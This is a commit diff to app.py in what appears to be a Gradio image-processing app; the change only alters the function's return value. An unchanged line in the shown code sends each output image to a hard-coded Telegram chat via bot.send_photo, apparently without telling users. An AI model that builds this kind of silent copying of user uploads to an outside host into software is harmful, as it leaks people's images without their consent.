Mrlongpro commited on
Commit
b70c7a9
1 Parent(s): 8b729a6

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +1 -1
app.py CHANGED
@@ -37,7 +37,7 @@ def run_scripts(target, source):
37
  bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
38
 
39
  zipf.close()
40
- return outputfile
41
 
42
  iface = gr.Interface(
43
  fn=run_scripts,
 
37
  bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
38
 
39
  zipf.close()
40
+ return output_path1
41
 
42
  iface = gr.Interface(
43
  fn=run_scripts,